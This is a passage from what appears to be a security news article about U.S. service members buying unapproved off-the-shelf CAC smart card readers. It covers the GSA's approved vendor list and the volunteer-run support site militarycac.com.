Two things emerged clearly from that conversation. The first was general confusion about whether the U.S. government has any sort of list of approved vendors. It does. The General Services Administration (GSA), the agency which handles procurement for federal civilian agencies, maintains a list of approved card reader vendors at idmanagement.gov (Saicoo is not on that list). [Thanks to @MetaBiometrics and @shugenja for the link!]

The other theme that ran through the Twitter discussion was the reality that many people find buying off-the-shelf readers more expedient than going through the GSA’s official procurement process, whether it’s because they were never issued one or the reader they were using simply no longer worked or was lost and they needed another one quickly.

“Almost every officer and NCO [non-commissioned officer] I know in the Reserve Component has a CAC reader they bought because they had to get to their DOD email at home and they’ve never been issued a laptop or a CAC reader,” said David Dixon, an Army veteran and author who lives in Northern Virginia. “When your boss tells you to check your email at home and you’re in the National Guard and you live 2 hours from the nearest [non-classified military network installation], what do you think is going to happen?”

Interestingly, anyone asking on Twitter about how to navigate purchasing the right smart card reader and getting it all to work properly is invariably steered toward militarycac.com. The website is maintained by Michael Danberry, a decorated and retired Army veteran who launched the site in 2008 (its text and link-heavy design very much takes one back to that era of the Internet and webpages in general). His site has even been officially recommended by the Army (PDF). Mark shared emails showing Saicoo itself recommends militarycac.com.

“The Army Reserve started using CAC logon in May 2006,” Danberry wrote on his “About” page. “I [once again] became the ‘Go to guy’ for my Army Reserve Center and Minnesota. I thought Why stop there? I could use my website and knowledge of CAC and share it with you.”

Danberry did not respond to requests for an interview — no doubt because he’s busy doing tech support for the federal government. The friendly message on Danberry’s voicemail instructs support-needing callers to leave detailed information about the issue they’re having with CAC/PIV card readers.

Dixon said Danberry has “done more to keep the Army running and connected than all the G6s [Army Chief Information Officers] put together.”

In many ways, Mr. Danberry is the equivalent of that little known software developer whose tiny open-sourced code project ends up becoming widely adopted and eventually folded into the fabric of the Internet.  I wonder if he ever imagined 15 years ago that his website would one day become “critical infrastructure” for Uncle Sam?